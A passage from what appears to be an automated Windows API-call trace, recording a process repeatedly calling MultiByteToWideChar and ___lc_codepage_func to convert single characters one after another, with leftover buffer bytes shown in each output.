CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x18←K☈`ﶸ)ნK\x18") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x19←K☈`ﶸ)ნK\x19") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x1a←K☈`ﶸ)ნK\x1a") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x1b←K☈`ﶸ)ნK\x1b") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x1c←K☈`ﶸ)ნK\x1c") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x1d←K☈`ﶸ)ნK\x1d") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x1e←K☈`ﶸ)ნK\x1e") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\x1f←K☈`ﶸ)ნK\x1f") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr=" ←K☈`ﶸ)ნK ") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="!←K☈`ﶸ)ნK!") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\"←K☈`ﶸ)ნK\"") returned 1 [0089.709] ___lc_codepage_func () returned 0x0 [0089.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="#←K☈`ﶸ)ნK#") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="$←K☈`ﶸ)ნK$") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="%←K☈`ﶸ)ნK%") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="&←K☈`ﶸ)ნK&") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="'←K☈`ﶸ)ნK'") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="(←K☈`ﶸ)ნK(") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr=")←K☈`ﶸ)ნK)") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="*←K☈`ﶸ)ნK*") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="+←K☈`ﶸ)ნK+") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr=",←K☈`ﶸ)ნK,") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="-←K☈`ﶸ)ნK-") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr=".←K☈`ﶸ)ნK.") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="/←K☈`ﶸ)ნK/") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="0←K☈`ﶸ)ნK0") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="1←K☈`ﶸ)ნK1") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="2←K☈`ﶸ)ნK2") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="3←K☈`ﶸ)ნK3") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="4←K☈`ﶸ)ნK4") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="5←K☈`ﶸ)ნK5") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="6←K☈`ﶸ)ნK6") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="7←K☈`ﶸ)ნK7") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="8←K☈`ﶸ)ნK8") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="9←K☈`ﶸ)ნK9") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr=":←K☈`ﶸ)ნK:") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr=";←K☈`ﶸ)ნK;") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="<←K☈`ﶸ)ნK<") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="=←K☈`ﶸ)ნK=") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr=">←K☈`ﶸ)ნK>") returned 1 [0089.710] ___lc_codepage_func () returned 0x0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="?←K☈`ﶸ)ნK?") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="@←K☈`ﶸ)ნK@") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="A←K☈`ﶸ)ნKA") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="B←K☈`ﶸ)ნKB") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="C←K☈`ﶸ)ნKC") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="D←K☈`ﶸ)ნKD") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="E←K☈`ﶸ)ნKE") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="F←K☈`ﶸ)ნKF") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="G←K☈`ﶸ)ნKG") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="H←K☈`ﶸ)ნKH") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="I←K☈`ﶸ)ნKI") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="J←K☈`ﶸ)ნKJ") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="K←K☈`ﶸ)ნKK") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="L←K☈`ﶸ)ნKL") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="M←K☈`ﶸ)ნKM") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="N←K☈`ﶸ)ნKN") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="O←K☈`ﶸ)ნKO") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="P←K☈`ﶸ)ნKP") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Q←K☈`ﶸ)ნKQ") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="R←K☈`ﶸ)ნKR") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="S←K☈`ﶸ)ნKS") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="T←K☈`ﶸ)ნKT") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="U←K☈`ﶸ)ნKU") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="V←K☈`ﶸ)ნKV") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="W←K☈`ﶸ)ნKW") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="X←K☈`ﶸ)ნKX") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Y←K☈`ﶸ)ნKY") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="Z←K☈`ﶸ)ნKZ") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="[←K☈`ﶸ)ნK[") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="\\←K☈`ﶸ)ნK\\") returned 1 [0089.711] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="]←K☈`ﶸ)ნK]") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="^←K☈`ﶸ)ნK^") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="_←K☈`ﶸ)ნK_") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="`←K☈`ﶸ)ნK`") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="a←K☈`ﶸ)ნKa") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="b←K☈`ﶸ)ნKb") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="c←K☈`ﶸ)ნKc") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="d←K☈`ﶸ)ნKd") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="e←K☈`ﶸ)ნKe") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="f←K☈`ﶸ)ნKf") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="g←K☈`ﶸ)ნKg") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="h←K☈`ﶸ)ნKh") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="i←K☈`ﶸ)ნKi") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="j←K☈`ﶸ)ნKj") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="k←K☈`ﶸ)ნKk") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="l←K☈`ﶸ)ნKl") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="m←K☈`ﶸ)ნKm") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="n←K☈`ﶸ)ნKn") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="o←K☈`ﶸ)ნKo") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="p←K☈`ﶸ)ნKp") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="q←K☈`ﶸ)ნKq") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="r←K☈`ﶸ)ნKr") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="s←K☈`ﶸ)ნKs") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="t←K☈`ﶸ)ნKt") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="u←K☈`ﶸ)ნKu") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="v←K☈`ﶸ)ნKv") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="w←K☈`ﶸ)ნKw") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="x←K☈`ﶸ)ნKx") returned 1 [0089.712] ___lc_codepage_func () returned 0x0 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="y←K☈`ﶸ)ნKy") returned 1 [0089.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="z←K☈`ﶸ)ნKz") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="{←K☈`ﶸ)ნK{") returned 1 [0089.713] MultiByteToWideChar (in: CodePage=0x0, 